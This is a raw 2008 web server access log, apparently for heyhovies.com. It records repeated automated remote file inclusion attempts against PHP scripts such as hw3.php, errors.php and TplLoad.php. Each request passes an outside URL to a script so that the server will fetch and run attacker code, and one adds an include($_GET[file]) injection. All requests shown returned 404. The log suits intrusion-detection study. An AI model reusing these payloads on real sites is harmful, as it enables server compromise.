62.97.194.235 - - [21/Aug/2008:07:46:08 -0700] "GET /logs/access.log//components/com_rwcards/rwcards.advancedate.php?mosConfig_absolute_path=http://vncownz.t35.com/scan/idnew.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.69" "www.heyhovies.com"
208.38.189.90 - - [21/Aug/2008:07:46:12 -0700] "GET /modify.php?installed_config_file=http://www.ordconstruction.com/skins/default_blue/mail/common_templates/index.php/echo? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.heyhovies.com"
69.64.34.172 - - [21/Aug/2008:07:46:31 -0700] "GET /logs/access_080804.log//weather/hw3.php//hw3.php?daysonly=0).include($_GET[file]).(0&file=http://h1.ripway.com/jembutz/idbaru.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.heyhovies.com"
69.64.34.172 - - [21/Aug/2008:07:46:32 -0700] "GET /logs/access_080804.log//weather/hw3.php//hw3.php?daysonly=0).include($_GET[file]).(0&file=http://h1.ripway.com/jembutz/idbaru.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.heyhovies.com"
69.64.34.172 - - [21/Aug/2008:07:46:32 -0700] "GET //weather/hw3.php//hw3.php?daysonly=0).include($_GET[file]).(0&file=http://h1.ripway.com/jembutz/idbaru.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.heyhovies.com"
69.64.34.172 - - [21/Aug/2008:07:46:32 -0700] "GET //weather/hw3.php//hw3.php?daysonly=0).include($_GET[file]).(0&file=http://h1.ripway.com/jembutz/idbaru.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.heyhovies.com"
69.64.34.172 - - [21/Aug/2008:07:46:32 -0700] "GET /logs//weather/hw3.php//hw3.php?daysonly=0).include($_GET[file]).(0&file=http://h1.ripway.com/jembutz/idbaru.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.heyhovies.com"
69.64.34.172 - - [21/Aug/2008:07:46:32 -0700] "GET /logs//weather/hw3.php//hw3.php?daysonly=0).include($_GET[file]).(0&file=http://h1.ripway.com/jembutz/idbaru.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.heyhovies.com"
92.48.68.66 - - [21/Aug/2008:07:46:42 -0700] "GET /logs/access_080804.log/errors.php?error=http://www.rajacademy.com/shop/blocks/echo.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.heyhovies.com"
92.48.68.66 - - [21/Aug/2008:07:46:42 -0700] "GET /errors.php?error=http://www.rajacademy.com/shop/blocks/echo.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.heyhovies.com"
92.48.68.66 - - [21/Aug/2008:07:46:42 -0700] "GET /logs/errors.php?error=http://www.rajacademy.com/shop/blocks/echo.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.heyhovies.com"
209.62.80.134 - - [21/Aug/2008:07:47:09 -0700] "GET /logs/errors.php?error=http://www.cerfirenze.it/images/icone/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; America Online Browser 1.1; rev1.2; Windows NT 5.1;)" "www.heyhovies.com"
209.62.80.134 - - [21/Aug/2008:07:47:09 -0700] "GET /errors.php?error=http://www.cerfirenze.it/images/icone/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-GB; rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1" "www.heyhovies.com"
92.48.68.66 - - [21/Aug/2008:07:47:16 -0700] "GET /logs/access.log/errors.php?error=http://www.rajacademy.com/shop/blocks/echo.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.heyhovies.com"
69.89.27.247 - - [21/Aug/2008:07:47:26 -0700] "GET /logs/access.log//faqsupport/samplefaqsupport.php?path[docroot]=http://www.books4internet.com/MyMail/admin/cache.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.heyhovies.com"
69.89.27.247 - - [21/Aug/2008:07:47:26 -0700] "GET //faqsupport/samplefaqsupport.php?path[docroot]=http://www.books4internet.com/MyMail/admin/cache.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.heyhovies.com"
69.89.27.247 - - [21/Aug/2008:07:47:26 -0700] "GET /logs//faqsupport/samplefaqsupport.php?path[docroot]=http://www.books4internet.com/MyMail/admin/cache.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.heyhovies.com"
216.235.247.169 - - [21/Aug/2008:07:47:54 -0700] "GET /logs/access_080815.log/modify.php?installed_config_file=http://www.21stcenturywoman.com/pics/echo? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.heyhovies.com"
216.235.247.169 - - [21/Aug/2008:07:47:54 -0700] "GET /logs/modify.php?installed_config_file=http://www.21stcenturywoman.com/pics/echo? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.heyhovies.com"
69.64.34.172 - - [21/Aug/2008:07:47:57 -0700] "GET /logs/access_080813.log//admin/classes/TplLoad.php?full_path_to_public_program=http://h1.ripway.com/jembutz/idbaru.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.heyhovies.com"
69.64.34.172 - - [21/Aug/2008:07:47:57 -0700] "GET //admin/classes/TplLoad.php?full_path_to_public_program=http://h1.ripway.com/jembutz/idbaru.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.heyhovies.com"
69.64.34.172 - - [21/Aug/2008:07:47:57 -0700] "GET /logs//admin/classes/TplLoad.php?full_path_to_public_program=http://h1.ripway.com/jembutz/idbaru.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.heyhovies.com"
69.64.34.172 - - [21/Aug/2008:07:47:58 -0700] "GET /logs/access_080731.log//admin/classes/TplLoad.php?full_path_to_public_program=http://h1.ripway.com/jembutz/idbaru.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.heyhovies.com"
201.130.79.130 - - [21/Aug/2008:07:48:06 -0